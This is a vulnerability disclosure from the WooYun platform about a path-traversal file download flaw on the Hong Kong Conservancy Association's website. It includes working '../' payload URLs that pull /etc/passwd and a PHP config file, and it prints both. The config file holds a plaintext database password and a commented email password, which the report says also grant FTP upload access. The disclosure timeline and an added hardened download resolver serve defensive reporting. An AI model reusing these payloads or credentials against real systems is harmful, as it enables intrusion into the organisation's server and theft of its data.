
Vulnerability Summary (24 followers)

Defect ID: wooyun-2015-0158401

Title: 香港长春社 (The Conservancy Association, Hong Kong) arbitrary file download (Hong Kong region)

Vendor: 香港长春社

Author: 路人甲

Submitted: 2015-12-05 23:26

Fixed: 2016-01-23 15:16

Published: 2016-01-23 15:16

Vulnerability type: Arbitrary file traversal/download

Severity: High

Self-assessed Rank: 20

Status: Handed to a third-party partner organisation (HKCERT, Hong Kong Computer Emergency Response Team Coordination Centre) for handling

Source: http://www.wooyun.org



Vulnerability Details

Disclosure status:

2015-12-05: Details sent to the vendor; awaiting vendor action
2015-12-09: Vendor confirmed; details visible to the vendor only
2015-12-19: Details opened to core white hats and relevant domain experts
2015-12-29: Details opened to regular white hats
2016-01-08: Details opened to intern white hats
2016-01-23: Details made public

Brief description:

Hello, HKCERT (香港互联网应急协调中心)~

Detailed description:

Download endpoint:

http://**.**.**.**/downproject.php?u=../../../../../../../../../../../etc/passwd


root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
www:x:80:80::/home/www:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
vizz:x:507:509::/home/vizz:/bin/bash
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
avahi-autoipd:x:100:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
myiconlight:x:103:80:**.**.**.**:/export/web/myiconlight:/sbin/nologin
mysql:x:508:508::/usr/local/mysql:/sbin/nologin
gino:x:502:500::/export/web/gino:/bin/bash
swsd2010:x:2653:80::/export/web/swsd2010:/bin/sh
alias:x:2654:510::/var/qmail/alias:/sbin/nologin
qmaild:x:2655:510::/var/qmail:/sbin/nologin
qmaill:x:2656:510::/var/qmail:/sbin/nologin
qmailp:x:2657:510::/var/qmail:/sbin/nologin
qmailq:x:2658:511::/var/qmail:/sbin/nologin
qmailr:x:2659:511::/var/qmail:/sbin/nologin
qmails:x:2660:511::/var/qmail:/sbin/nologin
aster:x:2534:80:**.**.**.**:/export/web/aster:/bin/sh
wincalpharm:x:2860:80:**.**.**.**:/export/web/wincalpharm:/sbin/nologin
dejohk:x:2862:80:**.**.**.**:/export/web/dejohk:/sbin/nologin
worldlinkhk:x:2864:80:**.**.**.**:/export/web/worldlinkhk:/sbin/nologin
outdoorproducts:x:2867:80:**.**.**.**:/export/web/outdoorproducts:/sbin/nologin
joannshe:x:2869:80:**.**.**.**:/export/web/joannshe:/bin/sh
synergytechhk:x:2872:80:**.**.**.**:/export/web/synergytechhk:/sbin/nologin
keibert:x:2873:80:**.**.**.**:/export/web/keibert:/sbin/nologin
healthguardcn:x:2875:80:**.**.**.**:/export/web/healthguardcn:/sbin/nologin
colroot:x:2876:80:**.**.**.**:/export/web/colroot:/sbin/nologin
cm2square:x:2878:80:**.**.**.**:/export/web/cm2square:/sbin/nologin
damoorghk:x:2882:80:**.**.**.**:/export/web/damoorghk:/sbin/nologin
taicohk:x:2884:80:**.**.**.**:/export/web/taicohk:/sbin/nologin
sideways:x:2888:80:**.**.**.**:/export/web/sideways:/sbin/nologin
timwaytest:x:2889:80:**.**.**.**:/export/web/timwaytest:/sbin/nologin
freeformoptical:x:2893:80:**.**.**.**:/export/web/freeformoptical:/sbin/nologin
jollykingdom:x:2894:80:**.**.**.**:/export/web/jollykingdom:/sbin/nologin
angelgrace:x:2902:80:**.**.**.**:/export/web/angelgrace:/sbin/nologin
searcheasy:x:2903:80:**.**.**.**:/export/web/searcheasy:/sbin/nologin
heijkoopinvest:x:2906:80:**.**.**.**:/export/web/heijkoopinvest:/sbin/nologin
cedhk:x:2912:80:**.**.**.**:/export/web/cedhk:/sbin/nologin
chinapromotion:x:2917:80:**.**.**.**:/export/web/chinapromotion:/bin/sh
chikahk:x:2918:80:**.**.**.**:/export/web/chikahk:/sbin/nologin
gianna:x:2927:80:**.**.**.**:/export/web/gianna:/sbin/nologin
biegoinc:x:2929:80:**.**.**.**:/export/web/biegoinc:/sbin/nologin
nexsos:x:2932:80:**.**.**.**:/export/web/nexsos:/sbin/nologin
pontitdg:x:2934:80:**.**.**.**:/export/web/pontitdg:/sbin/nologin
gowingroup:x:2935:80:**.**.**.**:/export/web/gowingroup:/bin/sh
iskydesign:x:2941:80:**.**.**.**:/export/web/iskydesign:/sbin/nologin
talentfocushk:x:2942:80:**.**.**.**:/export/web/talentfocushk:/sbin/nologin
taihingproducts:x:2944:80:**.**.**.**:/export/web/taihingproducts:/sbin/nologin
nasonpearl:x:2946:80:**.**.**.**:/export/web/nasonpearl:/sbin/nologin
miyabihk:x:2947:80:**.**.**.**:/export/web/miyabihk:/bin/sh
vizzpromotion:x:2948:80:**.**.**.**:/export/web/vizzpromotion:/sbin/nologin
mppromo:x:2954:80:**.**.**.**:/export/web/mppromo:/sbin/nologin
nashkhk:x:2955:80:**.**.**.**:/export/web/nashkhk:/sbin/nologin
phonebuytest:x:2956:80:**.**.**.**:/export/web/phonebuytest:/sbin/nologin
tonwell:x:2958:80:**.**.**.**:/export/web/tonwell:/sbin/nologin
rhemaengineer:x:2959:80:**.**.**.**:/export/web/rhemaengineer:/sbin/nologin
shundatest01:x:2964:80:**.**.**.**:/export/web/shundatest01:/sbin/nologin
pretterior:x:2965:80:**.**.**.**:/export/web/pretterior:/bin/sh
pressroom01:x:2966:80:**.**.**.**:/export/web/pressroom01:/sbin/nologin
tastefulbeers:x:2967:80:tastefulbeers.biz:/export/web/tastefulbeers:/sbin/nologin
northwing:x:2969:80:**.**.**.**:/export/web/northwing:/sbin/nologin
uarm:x:2970:80:**.**.**.**:/export/web/uarm:/sbin/nologin
chunkeehk:x:2971:80:**.**.**.**:/export/web/chunkeehk:/sbin/nologin
mesadahk:x:2974:80:**.**.**.**:/export/web/mesadahk:/sbin/nologin
jobsasap:x:2975:80:**.**.**.**:/export/web/jobsasap:/sbin/nologin
phplisttest:x:2976:80:**.**.**.**:/export/web/phplisttest:/bin/sh
heltexfashion:x:2980:80:**.**.**.**:/export/web/heltexfashion:/bin/sh
ambrosiacuisine:x:2982:80:**.**.**.**:/export/web/ambrosiacuisine:/bin/sh
pontiwinecell:x:2984:80:**.**.**.**:/export/web/pontiwinecell:/sbin/nologin
pontiwinesg:x:2985:80:**.**.**.**.sg:/export/web/pontiwinesg:/sbin/nologin
hktjq:x:2989:80:**.**.**.**:/export/web/hktjq:/bin/sh
...


Download endpoint:

http://**.**.**.**/downproject.php?u=../../configs/config.inc.php


<?php
define("__SITE_ROOT", dirname(__FILE__) . '/..' );
define('__DATABASE_TYPE', 'mysql');
define('__MYSQL_HOST', 'localhost'); // Database Host
define('__MYSQL_USER', 'cahkorghk'); // Database User
define('__MYSQL_PASSWD', 'QqYDxbkN'); // Database Password
define('__MYSQL_DATABASE', 'cahkorghk'); // Database Name
// Database Table Prefix
define('__MYSQL_PREFIX_F', 'ca'); // Greenpower Database Table Prefix
define('__MYSQL_ENCODING', 'UTF8'); // Database Encoding
define('__TEMPLATE_DIR', __SITE_ROOT . '/templates');
define('__TEMPLATE_COMPILE_DIR', __SITE_ROOT . '/templates_c');
define('__TEMPLATE_CONFIG_DIR', __SITE_ROOT . '/configs');
define('__TEMPLATE_CACHE_DIR', __SITE_ROOT . '/cache');
define('__TEMPLATE_LEFT_DELIMITER', '<{');
define('__TEMPLATE_RIGHT_DELIMITER', '}>');
define('__DEBUG', '1');
define('__SESSION_TIMEOUT', '60');
/* Modified at 20070726 for New Web Hosting */
define('__SESSION_PATH', __SITE_ROOT . '/sessions');
/* End Modified at 20070726 for New Web Hosting */
define('__PAGE_SHOW', '15');
define('__PAGE_SET', '10');
define('__SITE_COMPANY', 'Greenpower Minisite');
define('__SITE_SYSTEM', 'Website Management System');
define('__SITE_TITLE', __SITE_COMPANY . ' - ' . __SITE_SYSTEM);
define('__SITE_LOGO', 'images/logo.jpg');
define('__VERSION', '');
define('__COPYRIGHT', 'Copyright &copy; '.date('Y').' all rights reserved.');
define('__POWEREDBY', '');
//define('__EMAIL_SUBJECT', 'Greenpower Minisite');
//define('__EMAIL_SUBJECT_EN', 'Thank you for supporting !!');
define('__EMAIL_NAME', '長春社');
// define('__EMAIL_FROM', 'sunsky@**.**.**.**');
//define('__EMAIL_FROM_PASSWORD', 'Sk6263#Sup');
// define('__EMAIL_SMTPSERVER', '**.**.**.**');
define('__SMTP_AUTH', false);
// define('__SITE_URL', 'http://**.**.**.**/7.14butterflytest');
//define('__SITE_URL', 'http://**.**.**.**/greenpower/7.14butterfly');
//define('__EMAIL_SENDER', 'project@**.**.**.**');
// define('__CHECK_AUTHORIZED_IP', 0);
?>


The same password also logs in to FTP, where files can be uploaded:

FTP root at **.**.**.**
--------------------------------------------------------------------------------
09/29/2015 08:38AM 876 Contactus.php
09/29/2015 08:38AM 1,082 Environmental.php
09/29/2015 08:38AM 886 Personal_Information.php
09/29/2015 08:38AM 879 Privacy_notice.php
10/09/2015 03:18AM 1,824 about.php
09/29/2015 08:38AM 888 activity_news_details.php
09/29/2015 08:38AM 1,067 activity_news_list.php
12/02/2015 04:12AM Directory admin2s
08/28/2015 11:03AM Directory class
08/28/2015 11:04AM Directory classes
12/01/2015 07:38AM 576 co.php
08/28/2015 11:04AM Directory configs
12/02/2015 09:46AM 99,561 connector.php
12/01/2015 07:30AM 28 connn.php
08/28/2015 11:04AM Directory css
09/29/2015 08:38AM 851 database.php
09/29/2015 08:38AM 819 donation.php
08/28/2015 11:04AM Directory download
09/29/2015 08:38AM 314 download_subscription.php
09/29/2015 08:38AM 950 downproject.php
08/28/2015 11:04AM Directory fancybox
09/25/2015 06:53AM Directory images
08/28/2015 10:05AM Directory includes
09/29/2015 08:38AM 1,196 index.php
09/29/2015 08:38AM 573 join.php
12/02/2015 04:56AM Directory js
...


And the site's backend admin page:

[Screenshot: QQ截图20151204221318.png]


Proof of vulnerability:

As above.

Fix recommendation:

Filter the `u` parameter.
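To make "filter" concrete, here is an added example of a hardened download resolver; it is not the site's own downproject.php (whose source is not on this page). It assumes that downloadable files live in ./download (a directory that does appear in the FTP listing above) and that the file is selected by the `u` query parameter, as in the two PoC URLs; the "vulnerable" function is a hypothetical reconstruction of the pattern that produces this bug, not the site's code. The self-check at the bottom runs the resolver against the page's own two payloads plus a legitimate name.

```php
<?php
// Added example, not the site's own downproject.php (its source is not on this page).
// Assumptions: files to serve live in ./download, and the file is chosen by the `u`
// query parameter, as in the PoC URLs above.

// What the vulnerable handler most likely looked like (hypothetical reconstruction):
// user input is glued onto a base path, so "../" segments walk out of ./download.
function vulnerable_path(string $u): string
{
    return __DIR__ . '/download/' . $u;   // followed by readfile() in a real handler
}

// Hardened resolver. Returns the absolute path to serve, or null when the request is rejected.
function resolve_download(string $u, string $baseDir): ?string
{
    // PHP has already URL-decoded $_GET values, so "%2e%2e%2f" arrives here as "../".
    // NUL bytes make realpath() throw (PHP 8) or truncate the path (older PHP), so refuse them.
    if ($u === '' || strpos($u, "\0") !== false) {
        return null;
    }
    // Accept only a bare file name: no "/" or "\" at all, and no dot-files such as .htaccess.
    if (basename($u) !== $u || $u[0] === '.' || strpbrk($u, '/\\') !== false) {
        return null;
    }
    // Canonicalise both sides (resolves symlinks and "..") and require the candidate to be
    // strictly inside the base directory. This backs up the bare-name rule above.
    $base = realpath($baseDir);
    $candidate = realpath($baseDir . DIRECTORY_SEPARATOR . $u);
    if ($base === false || $candidate === false) {
        return null;
    }
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    // Serve regular files only, never directories or device nodes.
    return is_file($candidate) ? $candidate : null;
}

// Self-check against a constructed directory layout that mirrors the page's two PoCs.
$root = sys_get_temp_dir() . '/downproject_example_' . getmypid();
mkdir("$root/download", 0700, true);
mkdir("$root/configs", 0700, true);
file_put_contents("$root/download/report.pdf", 'sample');
file_put_contents("$root/configs/config.inc.php", '<?php // would-be secrets');

$cases = [
    'report.pdf'                                   => true,   // legitimate download
    '../../../../../../../../../../../etc/passwd'  => false,  // PoC 1 on this page
    '../../configs/config.inc.php'                 => false,  // PoC 2 on this page
    'download/report.pdf'                          => false,  // any path separator is refused
    '.htaccess'                                    => false,  // dot-files are refused
    ''                                             => false,
];
$allOk = true;
foreach ($cases as $input => $expectAllowed) {
    $got = resolve_download($input, "$root/download");
    $allowed = $got !== null;
    $allOk = $allOk && ($allowed === $expectAllowed);
    printf("%-46s %s\n", var_export($input, true), $allowed ? 'ALLOWED  ' . $got : 'REJECTED');
}

// Remove the constructed files again.
unlink("$root/download/report.pdf");
unlink("$root/configs/config.inc.php");
rmdir("$root/download");
rmdir("$root/configs");
rmdir($root);

exit($allOk ? 0 : 1);
```

In the real handler the call would be `resolve_download($_GET['u'] ?? '', __DIR__ . '/download')`, answering 404 on null and `readfile()` otherwise. Filtering alone does not undo what this report already demonstrates: config.inc.php with the database password was readable, and the same password opened FTP, so the database and FTP credentials need to be rotated as part of the fix.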

Copyright notice: please credit 路人甲@乌云 (WooYun) when reposting.


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmed at: 2015-12-09 16:07

Vendor reply:

Referred to related parties.

Latest status:

None